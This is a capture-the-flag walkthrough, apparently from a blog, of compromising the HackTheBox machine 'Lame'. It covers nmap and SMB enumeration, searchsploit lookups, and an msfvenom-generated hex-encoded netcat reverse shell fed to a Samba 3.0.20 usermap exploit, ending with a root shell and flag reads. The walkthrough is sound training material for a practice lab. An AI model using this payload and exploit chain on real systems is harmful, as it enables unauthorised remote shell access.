hackthebox lame walkthrough

hackthebox linux machine

Start the hack with nmap

# nmap -sC -sV -oA lame
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 10:55 EDT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 3h44m23s, deviation: 0s, median: 3h44m23s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-06-11T10:39:56-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.43 seconds

We see the port 21 is open. Lets search for the version in searchploit

# searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)| exploits/unix/remote/17491.rb

The FTP is vulnerable and we could get the RCE but for some reason, it didn’t work.

Moving on to samba.

# smbclient -L \\
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

Lets use smbmap

# smbmap -H
[+] Finding open SMB ports....
[+] User SMB session establishd on
[+] IP:	Name:                                        
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	tmp                                               	READ, WRITE
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS
	ADMIN$                                            	NO ACCESS

We have access to the tmp. Again, using smbclient to explore further.

# smbclient //
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun 11 11:02:24 2019
  ..                                 DR        0  Sun May 20 14:36:12 2012
  orbit-makis                        DR        0  Tue Jun 11 06:25:32 2019
  5145.jsvc_up                        R        0  Sun Jun  9 20:25:05 2019
  .ICE-unix                          DH        0  Sun Jun  9 20:24:02 2019
  .X11-unix                          DH        0  Sun Jun  9 20:24:27 2019
  gconfd-makis                       DR        0  Tue Jun 11 06:25:32 2019
  .X0-lock                           HR       11  Sun Jun  9 20:24:27 2019

		7282168 blocks of size 1024. 5678412 blocks available

We can upload file here but nothing else is fruitful for me. Moving ahead, the version of smb is 3.0.20. Lets search in searchploit

# searchsploit samba 3.0.20

Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) 

Great! We find RCE using Metasploit but let’s try to exploit without Metasploit. I find the python exploit here.

Generate your own payload and listen to the port for the shell.

# msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=1337 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 89 bytes
Final size of python file: 436 bytes
buf =  ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x7a"
buf += "\x73\x73\x6a\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31\x30"
buf += "\x2e\x31\x34\x2e\x36\x20\x31\x33\x33\x37\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x7a\x73\x73\x6a\x20\x7c\x20\x2f"
buf += "\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f"
buf += "\x7a\x73\x73\x6a\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d"
buf += "\x20\x2f\x74\x6d\x70\x2f\x7a\x73\x73\x6a\x20"

Paste above inside the file.

Run the exploit

# python samba-usermap-exploit.py 

Usage: samba-usermap-exploit.py <HOST>

# python samba-usermap-exploit.py

You will get the shell.

# nc -lvnp 1337
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 34022
which python
python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/# 

Now read the flags

[email protected]:/root# cat /home/makis/user.txt
[email protected]:/root# cat /root/root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *